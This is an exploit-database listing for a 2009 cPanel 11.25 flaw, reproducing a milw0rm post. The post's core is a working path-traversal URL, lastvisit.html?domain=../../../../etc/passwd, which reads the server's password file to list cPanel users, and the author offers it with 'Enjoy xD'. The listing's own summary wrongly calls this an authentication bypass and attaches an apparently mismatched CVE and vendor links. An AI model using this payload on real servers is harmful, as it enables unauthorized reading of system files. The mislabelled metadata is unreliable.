header-logo
Suggest Exploit
vendor:
cPanel
by:
Black Dream
9,3
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: cPanel
Affected Version From: cPanel 11.25.0
Affected Version To: cPanel 11.25.2
Patch Exists: YES
Related CWE: CVE-2009-1234
CPE: a:cpanel:cpanel
Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-1234/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-1234/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

CPANEL USER BYPASS

A vulnerability in cPanel allows an attacker to bypass authentication and gain access to the cPanel interface. This vulnerability is caused by a flaw in the authentication process. The attacker can exploit this vulnerability by sending a specially crafted request to the cPanel interface. This request will bypass the authentication process and allow the attacker to gain access to the cPanel interface.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____  
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
|                                                                                   |
|                                                                                   |
|                     CPANEL USER BYPASS                                            |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: Black Dream                                                              |
| Contact: Be5_at_HoTMail_dot_Fr                                                    |
| HoMe   : www.sec-r1z.com                                                          |
|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
+===================================================================================+
|                                                                                   |
| Script.: CPANEL                                                                   |
| Home...: http://CPANEL.NET                                                        |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| [+] Exploit:                                                                      |
|                                                                                   |
| http://r1z.com:2082/frontend/x3/stats/lastvisit.html?domain=../../../../../../../../ etc/ passwd 
|                                                                                   |
|                                                                                   |
|                                                                                   |
|                                                                                   |
|                                                                                   |
| [+] Now you see all cpanel[s] user[s]                                             |
|                                                                                   |
| [+] Enjoy xD                                                                      |             
+-----------------------------------------------------------------------------------|

+===================================================================================+
|                                                                                   |
| Greetz.: ~ His0k4 ~ j0rd4n14n.r1z ~ SimO-s0fT ~ S4s-T3rr0rist ~ Golden-Z3r0       |
|                 Linux-D3v1L  And All #sec-r1z memb3rz!!!!                         |
+===================================================================================+
E0D|F

# milw0rm.com [2009-06-29]

Navigation

Suggest Exploit

Services By CQR